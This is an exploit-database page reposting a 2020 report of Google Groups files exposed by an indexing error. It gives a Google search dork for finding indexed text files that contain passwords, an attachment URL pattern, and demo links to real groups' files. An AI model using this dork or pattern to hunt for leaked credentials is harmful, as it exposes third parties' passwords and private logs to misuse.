Advertisement






Google Groups - Public File Disclosure (Sensitive Info)

CVE Category Price Severity
N/A CWE-200 N/A High
Author Risk Exploitation Type Date
N/A Critical Remote 2020-12-09
CPE
cpe:cpe:/o:google:google_chrome
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120060

Below is a copy:

Google Groups - Public File Disclosure (Sensitive Info)
#############################################################
# Exploit Title: Google Groups - Public File Disclosure (Sensitive Info)
# Google Dork: site:googlegroups.com ext:txt "password:"
# Date: 2020-12-09
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: groups.google.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.9.0-kali2-686-pae #1 SMP Debian 5.9.6-1kali1 (2020-11-11) i686 GNU/Linux

#############################################################
[*] Vuln Info:
==============
Google confirmed that this was an index configuration error which resulted in the leakage of files containing sensitive information such as usernames, passwords, server log records, etc. but Google considers this to be out of scope as in the report issue #174821762,

Google said:
"Thanks for your input. We think the issue might not be severe enough for us to track it as an abuse risk.
When we file an abuse risk bug to product teams, we impose monitoring and escalation processes for teams to follow, and the abuse risk described in this report does not meet the threshold that we would usually require for this type of escalations on behalf of our team.
To provide feedback about our products, you can also use our
Google Product Forums, where you can share your feedback with other users and our product team.
That said - if you think we misunderstood your report, and you see a well defined abuse risk, please let us know what we missed.
Regards,
Singh, Google Trust & Safety"

#############################################################
[*] Exploit:
============
/group/[GroupName]/attach/[UniqueCode]/[FileName.ext]

#############################################################
[*] Demo:
=========
https://0758a63b-a-62cb3a1a-s-sites.googlegroups.com/site/eduvinasco/assignments/actividadincapprogramacion/Instrucciones.txt

https://googlegroups.com/a/onosproject.org/group/onos-discuss/attach/209bc307d6be17/PingallExample.txt

#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.